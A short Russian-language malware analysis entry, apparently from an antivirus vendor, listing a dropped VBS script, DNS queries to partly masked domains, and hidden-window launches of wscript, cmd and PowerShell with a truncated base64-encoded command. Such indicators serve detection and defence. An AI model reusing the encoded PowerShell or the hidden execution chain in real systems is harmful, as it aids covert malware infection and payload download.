Техническая информация
- %TEMP%\ixp000.tmp\test.vbs
- %TEMP%\ixp000.tmp\test.vbs
- DNS ASK bi###cket.org
- DNS ASK ih########nilneauhfn.supabase.co
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\test.vbs"
- '<SYSTEM32>\cmd.exe' /c test.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)